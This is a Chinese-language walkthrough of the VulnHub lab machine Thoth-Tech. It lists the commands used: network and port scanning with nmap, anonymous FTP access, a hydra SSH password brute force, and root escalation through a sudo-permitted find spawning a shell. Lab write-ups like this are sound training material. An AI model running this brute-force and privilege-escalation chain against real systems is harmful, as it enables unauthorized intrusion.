vulnhub靶机Thoth-Tech

下载地址:https://download.vulnhub.com/thothtech/Thoth-Tech.ova

主机发现

arp-scan -l

vulnhub靶机Thoth-Tech_第1张图片

目标:192.168.21.148

端口扫描

nmap --min-rate 10000 -p- 192.168.21.148

vulnhub靶机Thoth-Tech_第2张图片

服务扫描

nmap -sV -sT -O -p21,22,80 192.168.21.148

vulnhub靶机Thoth-Tech_第3张图片

漏洞扫描

nmap --script=vuln -p21,22,80 192.168.21.148

vulnhub靶机Thoth-Tech_第4张图片

先去看web网站

vulnhub靶机Thoth-Tech_第5张图片

在f12里面发现

再去看看web的别的

vulnhub靶机Thoth-Tech_第6张图片

vulnhub靶机Thoth-Tech_第7张图片

感觉少了点东西于是又扫了一遍

nmap -A 192.168.21.148

vulnhub靶机Thoth-Tech_第8张图片

发现ftp能匿名登入

去看看(用户名anonymous

ftp 192.168.21.148vulnhub靶机Thoth-Tech_第9张图片

vulnhub靶机Thoth-Tech_第10张图片

这里告诉我们pwnlab能爆破

hydra -l pwnlab -P /usr/share/wordlists/rockyou.txt ssh://192.168.21.148

vulnhub靶机Thoth-Tech_第11张图片

ssh登入

ssh [email protected]

vulnhub靶机Thoth-Tech_第12张图片

第一个flag

vulnhub靶机Thoth-Tech_第13张图片

信息收集

vulnhub靶机Thoth-Tech_第14张图片

10和11是我执行的发现有find

这里用find找可执行的文件

find / -user root -perm /40000 2>/dev/null

没有东西

再看看sudo

vulnhub靶机Thoth-Tech_第15张图片

find没有密码要求,那么就需要利用这个来提权了

find 命令提权 - 编程猎人 (programminghunter.com)

sudo find . -exec /bin/sh \; -quit

vulnhub靶机Thoth-Tech_第16张图片

结束

你可能感兴趣的:(vulnhub,安全,网络,网络安全,系统安全,web安全)